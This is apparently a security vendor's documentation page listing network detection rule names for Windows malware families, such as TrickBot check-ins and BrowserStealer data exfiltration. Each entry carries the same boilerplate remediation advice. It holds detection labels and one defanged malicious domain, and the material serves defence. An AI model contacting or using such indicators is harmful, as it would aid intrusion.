This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sisproc Variant POST to CnC Server

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sisron/BackDoor.Cybergate.1 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Small.AB or related Post-infection checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Small.qh/xSock User-Agent Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Snatch Ransomware - Encryption Finished

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Snatch Ransomware - Encryption Started

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/SodaMaster CnC HTTPS Checkin M1

Description
Copy link

Recommendation
Copy link

ET MALWARE Win32/SodaMaster CnC HTTPS Checkin M2

Description
Copy link

Recommendation
Copy link

ET MALWARE Win32/SodaMaster domain observed in TLS SNI (www. rare-coisns. com)

Description
Copy link

Recommendation
Copy link

ET MALWARE Win32/Spectre Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Spy.Agent.QAQ Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Banker.AAQD Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Banker.AAXV Retrieving key from Pinterest

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Banker.ABCG Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Banker.ACUT CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.SpyEyes.bllw CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.KeyLogger.ODN Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Odlanor CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Pavica.FH Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Socelars.S CnC Activity M4 (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Spy.Tuscas

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Spy/TVRat Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/StoredBt.A Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/StreamFlaw.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Swizzor User-Agent (Swizz03r)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Swrort.A Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Swrort.A Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TaskPerformer Downloader CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Tdss User Agent Detected (Mozzila)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Tesch.B CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Teslacrypt Ransomware HTTP CnC Beacon M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Teslacrypt Ransomware HTTP CnC Beacon M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Tflower Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Tiggre Variant Activity Sending System Files (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TinyNuke CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Tnega Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Tobfy.S

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Toby.N Multilocker Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Toby.N Multilocker Image Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Toby.N Multilocker Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Tofsee Connectivity Check M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Tofsee Connectivity Check M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trapwot FakeAV Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trapwot FakeAV Post Infection CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Travnet.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.TreasureHunter Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrickBot Anchor Variant Style External IP Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrickBot CnC Initial Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trickbot Data Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trickbot Data Exfiltration M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trickbot Data Exfiltration M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trickbot Data Exfiltration M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrickBot maserv Module CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrickBot maserv Module Command

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Agent.AXMO CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Trojan.Agent.FSTT CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Trojan.Agent.U3D7V0 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrojanDownloader.Agent.FC CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrojanDownloader.Agent.GEM CnC Checkin

Description
Copy link

Recommendation
Copy link

ET MALWARE Win32/TrojanDownloader.Agent.GEM CnC Command Fetch

Description
Copy link

Recommendation
Copy link

ET MALWARE Win32/TrojanDownloader.Agent.GEM CnC Domain Fetch

Description
Copy link

Recommendation
Copy link

ET MALWARE Win32/TrojanDownloader.Chekafe.D User-Agent my_check_data On Off HTTP Port

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrojanDownloader.Delf.BVP Win32/BioData CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/TrojanDownloader.Delf.BXC CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/TrojanDownloader.Small.AWO CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrojanDownloader.Waski.F Locker DL URI Struct Jul 25 2014

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M10

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M7

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M8

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Trojan.Nymeria CnC Activity (GET) M9

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/TrojanProxy.JpiProx.B CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/TrojanProxy.JpiProx.B CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Trojan.Valyria.6015 CnC Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Troj.Cidox Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.BrowserStealer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.BrowserStealer CnC Keep-Alive

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.BrowserStealer Data Exfil M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.BrowserStealer Data Exfil M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.BrowserStealer Data Exfil M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk Downloader CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.Joia CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Unk.VBScript Requesting Instruction from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Urausy.C Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Urausy.C Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Urausy.C Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Urausy.C Checkin 4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ursnif Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Usteal.B Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Uwamson Variant Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak - Plugin Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak - Stage 2 - Response - Plugin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak - Stage 2 - Response - Task

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak <v20 Checkin - Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak <v9 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak <v9 - Stage 2 - Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Valak Variant CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Variant.Zusy.402698 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.VBKrypt.vquj Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.VB.tdq - Fake User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Vermilion Stager Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

